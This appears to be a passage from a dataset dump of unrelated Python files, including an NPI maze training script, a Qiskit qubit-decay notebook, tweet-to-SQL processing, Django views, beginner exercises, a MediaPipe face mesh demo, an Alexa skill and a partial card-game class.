'/ter_accs', ter_accs / len(x), same_n_iter)\n same_n_iter += 1\n elif mode == 'test_dif':\n writer.add_scalar(mode + '/def_loss', step_def_loss / len(x), diff_n_iter)\n writer.add_scalar(mode + '/total_loss', step_total_loss / len(x), diff_n_iter)\n writer.add_scalar(mode + '/pro_accs', pro_accs / len(x), diff_n_iter)\n writer.add_scalar(mode + '/ter_accs', ter_accs / len(x), diff_n_iter)\n diff_n_iter += 1\n\n epoch_def_loss += step_def_loss\n epoch_total_loss += step_total_loss\n epoch_pro_accs += pro_accs\n epoch_ter_accs += ter_accs\n epoch_step += len(x)\n\n end_time = time.time()\n epoch_time = end_time - start_time\n print(\"Mode: {0:s} For whole Epoch {1:02d}, Time Consum {2:05f} Default Step Loss {3:05f}, \" \\\n \"Total Step Loss {4:05f}, Term Acc: {5:03f}, Prog Acc: {6:03f}\"\n .format(mode, curr_epoch, epoch_time, epoch_def_loss / epoch_step,\n epoch_total_loss / epoch_step, epoch_ter_accs / epoch_step,\n epoch_pro_accs / epoch_step))\n print('===============================')\n return (epoch_def_loss / epoch_step, epoch_total_loss / epoch_step,\n epoch_ter_accs / epoch_step, epoch_pro_accs / epoch_step)\n\ndef print_net(network):\n print('---------- Networks initialized -------------')\n num_params = 0\n for param in network.parameters():\n num_params += param.numel()\n print(network)\n print('NPI: Total number of parameters : %.3f M' % (num_params / 1e6))\n print('-----------------------------------------------')\n\nif __name__ == \"__main__\":\n start_epoch = 1\n max_num_epochs = 20\n exp_dir = os.path.join('tfboard', 'n2_5_50')\n if not os.path.exists(exp_dir):\n os.makedirs(exp_dir)\n writer = SummaryWriter(exp_dir)\n\n # according to the results of test same\n Best_results = dict()\n Best_results['def_loss'] = 1000000.0\n Best_results['epoch_def_loss'] = -1\n Best_results['total_loss'] = 1000000.0\n Best_results['epoch_total_loss'] = -1\n Best_results['ter_accs'] = 0.0\n Best_results['epoch_ter_accs'] = -1\n Best_results['pro_accs'] = 0.0\n Best_results['epoch_pro_accs'] = -1\n\n TRAIN_DATA_PATH = 'Data/train_5_50.pik'\n with open(TRAIN_DATA_PATH, 'rb', ) as f:\n train_data = pickle.load(f)\n\n TEST_SAME_DATA_PATH = 'Data/test_5_50.pik'\n with open(TEST_SAME_DATA_PATH, 'rb', ) as f:\n test_same_data = pickle.load(f)\n\n TEST_DIF_DATA_PATH = 'Data/test_10_50.pik'\n with open(TEST_DIF_DATA_PATH, 'rb', ) as f:\n test_dif_data = pickle.load(f)\n\n CUDA_VISIBLE_DEVICES = '1'\n print('Current GPU index: ' + CUDA_VISIBLE_DEVICES)\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = CUDA_VISIBLE_DEVICES\n\n if torch.cuda.is_available():\n cuda_flag = True\n else:\n cuda_flag = False\n\n maze_core = MazeCore()\n npi = NPI(maze_core, CONFIG)\n if cuda_flag:\n npi = npi.cuda()\n\n print_net(npi)\n\n parameters = filter(lambda p: p.requires_grad,\n npi.parameters())\n optimizer = torch.optim.SGD(parameters,\n lr=0.0001,\n momentum=0.9,\n nesterov=True,\n weight_decay=5e-4)\n # optimizer = torch.optim.Adam(parameters, lr=0.0001, betas=(0.5, 0.999))\n lr_schedulers = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer,\n T_max=max_num_epochs)\n\n for curr_epoch in range(start_epoch, max_num_epochs + 1):\n mode = 'train'\n run_epoch(npi, mode, train_data, writer)\n\n lr_schedulers.step(curr_epoch)\n if curr_epoch % 2 == 0:\n model_name = 'npi_' + str(curr_epoch) + '.pth'\n save_path = os.path.join(exp_dir, model_name)\n npi.save_network(save_path, cuda_flag)\n if cuda_flag:\n npi = npi.cuda()\n\n mode = 'test_same'\n cur_results = run_epoch(npi, mode, test_same_data, writer)\n\n def_loss, total_loss, ter_accs, pro_accs = cur_results\n\n if def_loss < Best_results['def_loss']:\n Best_results['def_loss'] = def_loss\n Best_results['epoch_def_loss'] = curr_epoch\n if total_loss < Best_results['total_loss']:\n Best_results['total_loss'] = total_loss\n Best_results['epoch_total_loss'] = curr_epoch\n if ter_accs > Best_results['ter_accs']:\n Best_results['ter_accs'] = ter_accs\n Best_results['epoch_ter_accs'] = curr_epoch\n if pro_accs > Best_results['pro_accs']:\n Best_results['pro_accs'] = pro_accs\n Best_results['epoch_pro_accs'] = curr_epoch\n\n mode = 'test_dif'\n run_epoch(npi, mode, test_dif_data, writer)\n\n save_path = os.path.join(exp_dir, 'npi_last.pth')\n npi.save_network(save_path, cuda_flag)\n if cuda_flag:\n npi = npi.cuda()\n\n for key, val in Best_results.items():\n if key.find('epoch') != -1:\n print('Best %s for test same at %d epoch' % (key, val))\n else:\n print('Best %s for test same: %f' % (key, val))\n\n\n\n\n\n","sub_path":"NPI_Maze/train_n2_5_50.py","file_name":"train_n2_5_50.py","file_ext":"py","file_size_in_byte":9749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"547904488","text":"# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.7.1\n# kernelspec:\n# display_name: gp-experiments\n# language: python\n# name: gp-experiments\n# ---\n\n# # $\\vert 0 \\rangle$ state decaying\n#\n# ## qubit: 0\n\n# +\nfrom pprint import pprint\nfrom datetime import date\n\nfrom experiments.utils import get_IBM_backend, pickle_load\nfrom experiments.waiting_duration.benchmarks import prepare_singleBench\nfrom experiments.waiting_duration import execute_bench, save_jobid_path\nfrom experiments.waiting_duration import calculate_results, save_data_path\n# -\n\n\n# user input\nbackend_name = \"ibmq_toronto\"\nnseed = 5\ndate = \"2020-11-24\"\ninitial_layout = [0]\n\n# +\n# define backends\nbackend = get_IBM_backend(backend_name, reservations=True)\nsimulator = get_IBM_backend(\"ibmq_qasm_simulator\")\n\n# type of experiments \nexp_type = \"single_qubit\"\ninitial_state=\"zero_state\"\n# -\n\n# ## backend configuratiaon\n\n# +\nprint(\"####################### dutation time #######################\")\ndt = backend.configuration().dt\nprint(\"1 dt = \", dt, \" sec\")\nprint(\" = \", dt * 10**10, \"ns\")\n\nprint()\n\nprint(\"####################### gate length #######################\")\ncoupling_map = backend.configuration().coupling_map\nprop = backend.properties()\ncx_durations = []\nfor coup in coupling_map:\n length = prop.gate_length(\"cx\", coup)\n cx_durations.append(length)\n print(coup, length)\n\nimport numpy as np\nprint(\"##################################################\")\nprint(\"max: \", max(cx_durations), \" (sec)\")\nprint(\"min: \", min(cx_durations), \" (sec)\")\nprint(\"mean: \", np.mean(cx_durations), \" (sec)\")\n# -\n\n# ## Send job\n\n# max(dt) = 1E6\njobid_path_e6 = save_jobid_path(date, \"e6\", initial_state, initial_layout)\ndelay_duration_e6 = [0, 50000, 100000, 150000, 200000, 250000, 300000, 350000, 400000, 450000, 500000, 550000, 600000, 650000, 700000, 750000, 800000, 850000, 900000, 950000, 1000000]\n\n# +\n# qc = prepare_singleBench(initial_state, \"e6\")\n# execute_bench(\n# qc, \n# backend=backend, \n# simulator=simulator, \n# initial_layout=initial_layout, \n# save_path = jobid_path_e6,\n# delay_duration_list=delay_duration_e6,\n# nseed=nseed, \n# )\n# -\n\n# max(dt) = 1E5\n# delay dulation label\njobid_path_e5 = save_jobid_path(date, \"e5\", initial_state, initial_layout)\ndelay_duration_e5 = [0, 5000, 10000, 15000, 20000, 25000, 30000, 35000, 40000, 45000, 50000, 55000, 60000, 65000, 70000, 75000, 80000, 85000, 90000, 95000, 100000]\n\n# +\n# qc = prepare_singleBench(initial_state, \"e5\")\n# execute_bench(\n# qc, \n# backend=backend, \n# simulator=simulator, \n# initial_layout=initial_layout, \n# save_path = jobid_path_e5,\n# delay_duration_list=delay_duration_e5,\n# nseed=nseed, \n# )\n# -\n\n# max(dt) = 1E4\n# delay dulation label\njobid_path_e4 = save_jobid_path(date, \"e4\", initial_state, initial_layout)\ndelay_duration_e4 = [0, 500, 1000, 1500, 2000, 2500, 3000, 3500, 4000, 4500, 5000, 5500, 6000, 6500, 7000, 7500, 8000, 8500, 9000, 9500, 10000]\n\n# +\n# qc = prepare_singleBench(initial_state, \"e4\")\n# execute_bench(\n# qc, \n# backend=backend, \n# simulator=simulator, \n# initial_layout=initial_layout, \n# save_path = jobid_path_e4,\n# delay_duration_list=delay_duration_e4,\n# nseed=nseed, \n# )\n# -\n\n# ## calculate results\n\nsavedata_path_e6 = save_data_path(date, \"e6\", initial_state, initial_layout)\n\n# +\n# e6 = calculate_results(delay_duration_e6, jobid_path_e6, savedata_path_e6, backend, simulator, nseed)\n# pprint(e6)\n# -\n\nsavedata_path_e5 = save_data_path(date, \"e5\", initial_state, initial_layout)\n\n# +\n# e5 = calculate_results(delay_duration_e5, jobid_path_e5, savedata_path_e5, backend, simulator, nseed)\n# pprint(e5)\n# -\n\nsavedata_path_e4 = save_data_path(date, \"e4\", initial_state, initial_layout)\n\n# +\n# e4 = calculate_results(delay_duration_e4, jobid_path_e4, savedata_path_e4, backend, simulator, nseed)\n# pprint(e4)\n# -\n\nfrom experiments.waiting_duration import plot_decay, save_plot_path\n\nsave_plot_path_e6 = save_plot_path(date, \"e6\", initial_state, initial_layout)\ne6 = pickle_load(savedata_path_e6)\nplot_decay(e6, delay_duration_e6, save_plot_path_e6, ymin=0, ymax=0.75)\n\nsave_plot_path_e5 = save_plot_path(date, \"e5\", initial_state, initial_layout)\ne5 = pickle_load(savedata_path_e5)\nplot_decay(e5, delay_duration_e5, save_plot_path_e5, ymin=0, ymax=0.5)\n\nsave_plot_path_e4 = save_plot_path(date, \"e4\", initial_state, initial_layout)\ne4 = pickle_load(savedata_path_e4)\nplot_decay(e4, delay_duration_e4, save_plot_path_e4, ymin=0, ymax=0.25)\n\n\n","sub_path":"waiting_duration/experiments/ibmq_toronto/single_qubit/20201122_zerostate_0_ibmq_toronto.py","file_name":"20201122_zerostate_0_ibmq_toronto.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"83043760","text":"from textblob import TextBlob\nimport pyodbc\nfrom config import * \nimport preprocessor as p\n\n\nimport json\n\nfrom utils import *\n\ndef process_data(data):\n users = process_users(data)\n tweets = process_tweets(data)\n\n\ndef process(data):\n users, tweets, times, places = [], [], [], []\n\n for item in data:\n try:\n user = item[\"user\"]\n users.append((user[\"id\"], user[\"screen_name\"], user[\"name\"], clean(user[\"description\"]),\n user[\"lang\"], parse_datetime(user[\"created_at\"]), user[\"time_zone\"], user[\"location\"]))\n except Exception as e:\n pass \n\n try:\n tweets.append((item[\"id\"], clean(item[\"text\"]), parse_datetime(item[\"created_at\"]),\n get_source(item[\"source\"]), item[\"lang\"], TextBlob(clean(item[\"text\"])).polarity,\n if_exists_else_zero(item[\"in_reply_to_status_id\"]),\n if_exists_else_zero(item[\"in_reply_to_user_id\"]),\n if_exists_else_space(item[\"in_reply_to_screen_name\"])))\n except Exception as e:\n pass\n\n try:\n t = datetime.datetime.now().timestamp()\n seconds, minutes, hours, day, month, year = time_list(idem[\"created_at\"])\n\n times.append((t, seconds, minutes, hours, day, month, year))\n except Exception as e:\n pass \n \n\ndef insert_place(data):\n data = data[\"place\"]\n place_id = if_exists_else_zero(data[\"id\"]) if data else 0\n place_country_code = if_exists_else_space(data[\"country_code\"]) if data else \"\"\n place_country = if_exists_else_space(data[\"country\"]) if data else \"\"\n place_name = if_exists_else_space(data[\"name\"]) if data else \"\"\n place_full_name = if_exists_else_space(data[\"full_name\"]) if data else \"\"\n place_type = if_exists_else_space(data[\"place_type\"]) if data else \"\"\n\n query = \"insert into place_dim values ({}, '{}', '{}', '{}', '{}', '{}')\".format(\n place_id, place_country_code, place_country,\n place_name, place_full_name, place_type\n )\n\n return query\n\n\ndef insert_tweet_fact(data, tweet_dim_id, user_dim_id, time_dim_id, place_dim_id):\n try:\n retweet_count = data[\"retweet_count\"]\n favorite_count = data[\"favorite_count\"]\n\n query = \"insert into tweet_fact values({}, {}, {}, {}, {}, {});\".format(\n tweet_dim_id, user_dim_id, time_dim_id, place_dim_id, retweet_count, favorite_count\n )\n\n cursor.execute(query)\n except Exception as e: \n print(e)\n\n\ndef insert_user_fact(data, user_dim_id, time_dim_id):\n try:\n data = data[\"user\"]\n friends_count = data[\"friends_count\"]\n followers_count = data[\"followers_count\"]\n listed_count = data[\"listed_count\"]\n statuses_count = data[\"statuses_count\"]\n favourites_count = data[\"favourites_count\"]\n\n query = \"insert into user_fact values ({}, {}, {}, {}, {}, {}, {})\".format(\n user_dim_id, time_dim_id, friends_count, followers_count, listed_count,\n statuses_count, favourites_count\n )\n\n cursor.execute(query)\n except Exception as e:\n print(e)\n","sub_path":"dummy/process_.py","file_name":"process_.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"336734162","text":"from django.shortcuts import render\nfrom .models import Topic, Entry\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.urls import reverse\nfrom .forms import TopicForm,EntryForm\nfrom django.contrib.auth.decorators import login_required\n# Create your views here.\n#显示主页\ndef index(request):\n return render(request,'webapp/index.html')\n\n#显示主题\n@login_required\ndef topics(request):\n topics=Topic.objects.filter(owner=request.user).order_by('date_added')\n context={'topics':topics}\n return render(request,'webapp/topics.html',context)\n\n#显示单个主题及其所有条目\n@login_required\ndef topic(request, topic_id):\n topic=Topic.objects.get(id=topic_id)\n if topic.owner!=request.user:\n raise Http404\n\n entries=topic.entry_set.order_by('-date_added')\n context={'topic':topic,'entries':entries}\n return render(request, 'webapp/topic.html',context)\n\n\n#添加新主题\n@login_required\ndef new_topic(request):\n if request.method!='POST':\n #未提交数据:创建一个新表单\n form=TopicForm()\n else:\n #POST提交的数据,对数据进行处理\n form=TopicForm(request.POST)\n if form.is_valid():\n new_topic=form.save(commit=False)\n new_topic.owner=request.user\n new_topic.save()\n return HttpResponseRedirect(reverse('webapp:topics'))\n context={'form':form}\n return render(request,'webapp/new_topic.html',context)\n\n@login_required\ndef edit_entry(request, entry_id):\n #编辑目录\n entry=Entry.objects.get(id=entry_id)\n topic=entry.topic\n if topic.owner!=request.user:\n raise Http404\n if request.method!='POST':\n form=EntryForm(instance=entry)\n else:\n form=EntryForm(instance=entry, data=request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('webapp:topic', args=[topic.id]))\n context={'entry':entry, 'topic':topic, 'form':form}\n return render(request, 'webapp/edit_entry.html',context)\n\n\n@login_required\ndef new_entry(request, topic_id):\n #在特定主题中添加目录\n topic=Topic.objects.get(id=topic_id)\n\n if request.method!='POST':\n #未提交数据,创建一个空表单\n form=EntryForm()\n else:\n #POST提交的数据,对数据进行处理\n form=EntryForm(data=request.POST)\n if form.is_valid():\n new_entry=form.save(commit=False)\n new_entry.topic=topic\n new_entry.save()\n return HttpResponseRedirect(reverse('webapp:topic',args=[topic_id]))\n context={'topic':topic, 'form':form}\n return render(request,'webapp/new_entry.html',context)","sub_path":"webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"113549722","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 24 14:31:36 2019\r\n\r\n@author: Training29\r\n\"\"\"\r\n\r\n#### 1. Write a python program to create a Dictionary. #########\r\n\r\nstring = 'vijayakumar' \r\nmy_dict = {}\r\nfor letter in string:\r\n my_dict[letter] = my_dict.get(letter, 0) + 1\r\nprint(my_dict)\r\n\r\n### 2. Write a python program to access the values in the Dictionary. ###\r\ndict = {'name': 'vijay', 'age': 27}\r\nprint(dict['name'])\r\nprint(dict.get('age'))\r\n\r\n### 3. Write a python program to update the above created dictionary. ####\r\na = {'name': 'vijay','age': 27}\r\nb = {'name': 'raj','address': 'ssss'}\r\na.update(b)\r\nprint(a)\r\n\r\n###4. Write a python program to delete the above created dictionary. ####\r\na = {'name': 'vijay','age': 27,'address': 'ssss'}\r\ndel a['name']\r\ndel a['address']\r\ndel a['age']\r\nprint(a)\r\n#### OTHER METHOD #####\r\na = {'name': 'vijay','age': 27,'address': 'ssss'}\r\na.clear()\r\nprint(a)\r\n\r\n### 5. Write a python code to copy the entire dictionary into a new dictionary.#####\r\n\r\na = {'name': 'vijay','age': 27,'address': 'ssss'}\r\nb = a.copy()\r\nprint(b)\r\n\r\n###6. Write a python code to delete keys from the dictionary.#########\r\n\r\na = {'name': 'vijay','age': 27,'address': 'ssss'}\r\ndel a['age']\r\nprint(a)\r\n\r\n#### OTHER METHOD #####\r\na = {'name': 'vijay','age': 27,'address': 'ssss'}\r\n\r\nif 'age' in a:\r\n del a['age']\r\n print(a)\r\n \r\n ##### 7. Write a python code to sort the elements in the dictionary. #####\r\n a = {'vijay': 27,'ajay': 25,'ravi': 22, 'siva': 26}\r\n for n in sorted(a):\r\n print(n, a[n])\r\n \r\n\r\n\r\n\r\n","sub_path":"Python/Dictonary.py","file_name":"Dictonary.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"515549027","text":"import cv2 as cv\nimport mediapipe as mp\nmp_drawing = mp.solutions.drawing_utils\nmp_face_mesh = mp.solutions.face_mesh\n\nface_mesh = mp_face_mesh.FaceMesh(\n min_detection_confidence=0.5, min_tracking_confidence=0.5)\ndrawing_spec = mp_drawing.DrawingSpec(color=(128,128,128), thickness=1, circle_radius=1)\ncap = cv.VideoCapture(0)\n\nwhile cap.isOpened():\n success, image = cap.read()\n if not success:\n break\n\n image = cv.cvtColor(cv.flip(image, 1), cv.COLOR_BGR2RGB)\n image.flags.writeable = False\n results = face_mesh.process(image)\n\n image.flags.writeable = True\n image = cv.cvtColor(image, cv.COLOR_RGB2BGR)\n if results.multi_face_landmarks:\n for face_landmarks in results.multi_face_landmarks:\n mp_drawing.draw_landmarks(\n image=image,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACE_CONNECTIONS,\n landmark_drawing_spec=drawing_spec,\n connection_drawing_spec=drawing_spec)\n cv.imshow('MediaPipe FaceMesh', image)\n if cv.waitKey(1) & 0xFF == ord('q'):\n break\nface_mesh.close()\ncap.release()\n","sub_path":"mediapipe/face/face_mesh.py","file_name":"face_mesh.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"606334130","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n if l1 == None:\n return l2\n if l2 == None:\n return l1\n head = ListNode(None)\n l3 = head\n while l1 and l2:\n if l1.val < l2.val:\n l3.next = l1\n l1 = l1.next\n l3 = l3.next\n else:\n l3.next = l2\n l2 = l2.next\n l3 = l3.next\n l3.next = l1 if l1 else l2\n return head.next\n\n\n\n\n\nif __name__ == '__main__':\n sol = Solution()\n output = sol.mergeTwoLists()\n print(output)","sub_path":"easy/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"34802974","text":"from mongoengine import *\nimport datetime\nfrom pprint import pprint\n\n\nconnect('IECA',host='localhost', port=27017)\n\n#Modelo\nclass Post(Document):\n _nombre = StringField(required=True, max_length=200)\n _correo = StringField(required=True, max_length=50)\n _contrasena = StringField(required=True, max_length=50)\n _materias = ListField(StringField(required=True,max_length=20))\n _published = DateField(default=datetime.datetime.now(None))\n\nprint('Ingreso de estudiantes a base de datos IECA\\n')\nprint('1.- Agregar estudiante')\nprint('2.- Mostrar estudiantes')\nprint('3.- Actualizar estudiantes')\nprint('4.- Eliminar estudiante')\nprint('5.- Salir\\n')\nselect = int(input(\"Seleccion: \"))\n\n\n\n\nif __name__ == '__main__':\n\n while select < 5: #Crear objetos con ID nuevo en DB\n\n\n if select==1:\n\n post = Post(\n _nombre='',\n _correo='',\n _contrasena='',\n _materias=['']\n )\n post._nombre = input('Ingresa un nombre: ')\n post._correo = input('Ingresa correo: ')\n post._contrasena = input('Ingresa contraseña: ')\n input_string = input(\"Ingresa materias separadas por coma: \")\n materias_lista = input_string.split(\",\")\n post._materias = materias_lista\n post.save()\n\n select = int(input(\"Seleccion: \"))\n\n elif select == 2:\n\n for p in Post.objects:\n pprint(p._nombre)\n pprint(p._correo)\n pprint(p._materias)\n\n select = int(input(\"Seleccion: \"))\n\n elif select == 3:\n pass\n\n","sub_path":"StudentsIO.py","file_name":"StudentsIO.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"536480353","text":"from __future__ import with_statement\nimport urllib\nimport webapp2\nimport csv\nfrom StringIO import StringIO\n\nfrom google.appengine.ext import blobstore\nfrom google.appengine.ext.webapp import blobstore_handlers\nfrom google.appengine.api import files\nfrom Crypto.PublicKey import RSA\nfrom Crypto import Random\n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n self.response.out.write(\n '''\n \n \n
\n \n Enter Key: \n \n \n \n \n '''\n )\n\nclass UploadHandler(webapp2.RequestHandler):\n \n \n @staticmethod\n def crypt(plaintext, key):\n # Use a fixed private key here to get a deterministic result for testing\n key = RSA.importKey(key)\n enc_data = key.encrypt(plaintext, 32)\n \n # encode the byte data into ASCII data so that it could be printed out in the browser\n return enc_data[0].encode('base64')\n \n def old_crypt(self, plaintext):\n # Use a fixed private key here to get a deterministic result for testing\n public_key = key.publickey()\n enc_data = public_key.encrypt(plaintext, 32)\n \n # encode the byte data into ASCII data so that it could be printed out in the browser\n return enc_data[0].encode('base64')\n\n def post(self):\n rows=self.request.POST.get('file').value\n key = self.request.POST.get('key')\n file_name = files.blobstore.create(mime_type='text/plain')\n with files.open(file_name, 'a') as f:\n writer = csv.writer(f , delimiter=',')\n for row in csv.reader(StringIO(rows), delimiter=','):\n if len(row) > 1:\n row[1] = self.crypt(row[1], key)\n writer.writerow(row)\n files.finalize(file_name)\n \n blobs = blobstore.BlobInfo.all()\n blob_links = [\n 'File %s
' % (blob.key(), index+1)\n for index, blob in enumerate(blobs)\n ]\n \n self.response.out.write(\n '''\n \n \n %s\n \n \n ''' % \"\".join(blob_links)\n )\n\nclass ServeHandler(blobstore_handlers.BlobstoreDownloadHandler):\n def get(self, resource):\n resource = str(urllib.unquote(resource))\n blob_info = blobstore.BlobInfo.get(resource)\n self.send_blob(blob_info)\n\napp = webapp2.WSGIApplication([('/', MainHandler),\n ('/upload', UploadHandler),\n ('/serve/([^/]+)?', ServeHandler)],\n debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"406560263","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ndef is_even_len(string: str) -> bool: # nb caractères est pair ? cad si len Divisible par 2 sans reste (modulo) => pair\n if len(string) % 2 == 0:\n return True\n return False\n\n\ndef remove_third_char(string: str) -> str: # str[0:2]+[3:]\n return string[0:2] + string[3:]\n\n\ndef replace_char(string: str, old_char: str, new_char: str) -> str: #À refaire\n position_of_old_char = string.index(old_char) # donne position/l'index qui est un int. Alternative for loop and if statement pcq comme c'est, pas capable d'identifier pls old_char\n string = string[:position_of_old_char] + new_char + string[position_of_old_char+1 :]\n return string\n\ndef get_number_of_char(string: str, char: str) -> int:\n number_of_char = 0\n for i in string:\n if i == char:\n number_of_char += 1\n return number_of_char\n\n # Solution that didn't work\n # positions_of_char = (string.index(char))\n # number_of_char = len(f'{positions_of_char}')\n # return number_of_char\n\n\ndef get_number_of_words(sentence: str, word: str) -> int:\n number_of_word = 0\n sentence = sentence.split() #sépare sentence en une liste de mots ['ceci', 'est', 'une', 'phrase', 'test']\n for i in sentence: # pourquoi ecq for word in sentence: ne fonctionne pas\n if i == word:\n number_of_word += 1\n return number_of_word\n\ndef main() -> None:\n chaine = \"Bonjour!\"\n if is_even_len(chaine):\n print(f\"Le nombre de caractère dans la chaine {chaine} est pair\")\n else:\n print(f\"Le nombre de caractère dans la chaine {chaine} est impair\")\n\n chaine = \"salut monde!\"\n print(f\"On supprime le 3e caractère dans la chaine: {chaine}. Résultat : {remove_third_char(chaine)}\")\n\n chaine = \"hello world!\"\n print(f\"On remplace le caractère w par le caractère z dans la chaine: {chaine}. Résultat : {replace_char(chaine, 'w', 'z')}\")\n\n print(f\"Le nombre d'occurrence de l dans 'hello world' est : {get_number_of_char(chaine, 'l')}\")\n\n chaine = \"Baby shark doo doo doo doo doo doo\"\n print(f\"L'occurence du mot doo dans la chaine {chaine} est: {get_number_of_words(chaine, 'doo')}\")\n\n\nif __name__ == '__main__':\n main()\n\n# complet 2\n","sub_path":"exercice.py","file_name":"exercice.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"89655081","text":"from django import forms\r\n\r\nfrom .models import Anuncio\r\nfrom .validators import validate_category\r\n\r\n\r\nclass AnuncioCreateForm(forms.ModelForm):\r\n class Meta:\r\n model = Anuncio\r\n fields = [\r\n 'name',\r\n 'cidade',\r\n 'transacao',\r\n 'tipo',\r\n 'quartos',\r\n 'banheiros',\r\n 'vagas',\r\n 'slug',\r\n ]\r\n\r\n def clean_name(self):\r\n name = self.cleaned_data.get(\"name\")\r\n if name == \"Hello\":\r\n raise forms.ValidationError(\"Not a valid name\")\r\n return name\r\n\r\n # def clean_email(self):\r\n # email = self.cleaned_data.get(\"email\")\r\n # if \".edu\" in email:\r\n # raise forms.ValidationError(\"We do not accept edu emails\")\r\n # return email","sub_path":"imoveis/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"258478072","text":"from ask_sdk_core.skill_builder import SkillBuilder\nimport json\n\nsb = SkillBuilder()\nfrom ask_sdk_core.utils import is_request_type\nfrom ask_sdk_model.ui import SimpleCard\nfrom ask_sdk_model import Response\nfrom ask_sdk_model.interfaces.alexa.presentation.apl import (\n RenderDocumentDirective, ExecuteCommandsDirective, SpeakItemCommand,\n AutoPageCommand, HighlightMode)\n\nfrom ask_sdk_core.utils import is_intent_name\n\ndef _load_apl_document(file_path):\n # type: (str) -> Dict[str, Any]\n \"\"\"Load the apl json document at the path into a dict object.\"\"\"\n with open(file_path) as f:\n return json.load(f)\n\n@sb.request_handler(can_handle_func=is_request_type(\"LaunchRequest\"))\ndef launch_request_handler(handler_input):\n speech_text = \"Welcome to the Alexa Skills Kit, you can say hello!\"\n\n handler_input.response_builder.speak(speech_text).set_should_end_session(\n False).add_directive(\n RenderDocumentDirective(\n token=\"pagerToken\",\n document=_load_apl_document(\"hello_world_apl_template.json\")['document'],\n datasources=_load_apl_document(\"hello_world_apl_template.json\")['dataSources']\n )\n )\n return handler_input.response_builder.response\n\n\n@sb.request_handler(can_handle_func=is_intent_name(\"HelloWorldIntent\"))\ndef hello_world_intent_handler(handler_input):\n speech_text = \"Hello World!\"\n\n handler_input.response_builder.speak(speech_text).set_should_end_session(\n True).add_directive(RenderDocumentDirective(\n token=\"pagerToken\",\n document=_load_apl_document(\"hello_world_apl_template.json\")['document'],\n datasources=_load_apl_document(\"hello_world_apl_template.json\")['dataSources']\n )\n )\n return handler_input.response_builder.response\n\n@sb.request_handler(can_handle_func=is_intent_name(\"AMAZON.HelpIntent\"))\ndef help_intent_handler(handler_input):\n speech_text = \"You can say hello to me!\"\n\n handler_input.response_builder.speak(speech_text).ask(speech_text).set_card(\n SimpleCard(\"Hello World\", speech_text)).add_directive(\n RenderDocumentDirective(\n token=\"pagerToken\",\n document=_load_apl_document(\"hello_world_apl_template.json\")['document'],\n datasources=_load_apl_document(\"hello_world_apl_template.json\")['dataSources']\n )\n )\n return handler_input.response_builder.response\n\n@sb.request_handler(\n can_handle_func=lambda input :\n is_intent_name(\"AMAZON.CancelIntent\")(input) or\n is_intent_name(\"AMAZON.StopIntent\")(input))\ndef cancel_and_stop_intent_handler(handler_input):\n speech_text = \"Goodbye!\"\n\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Hello World\", speech_text))\n return handler_input.response_builder.response\n\n@sb.request_handler(can_handle_func=is_request_type(\"SessionEndedRequest\"))\ndef session_ended_request_handler(handler_input):\n #any cleanup logic goes here\n\n return handler_input.response_builder.response\n\n@sb.exception_handler(can_handle_func=lambda i, e: True)\ndef all_exception_handler(handler_input, exception):\n # Log the exception in CloudWatch Logs\n print(exception)\n\n speech = \"Sorry, I didn't get it. Can you please say it again!!\"\n handler_input.response_builder.speak(speech).ask(speech)\n return handler_input.response_builder.response\n\nhandler = sb.lambda_handler()\n\n","sub_path":"hello-world-apl-alexa/hello-world-apl.py","file_name":"hello-world-apl.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"156884153","text":"class Player:\n \n def __init__(self, name):\n self.total_points = 0\n self.name = name\n \n def call_total_points(self):\n print(f'total points: {self.total_points}')\n \n def pick_card(self, card, isOpenCall=True):\n if isOpenCall:\n print(f'picked card: {card}')\n else:\n print('picked card: ???')\n \n self.point = self.conv_card2point(card)\n self.total_points += self.point\n \n def conv_card2point(self, card):\n tmp = card[1:]\n try:\n val = int(tmp)\n except:\n if tmp == 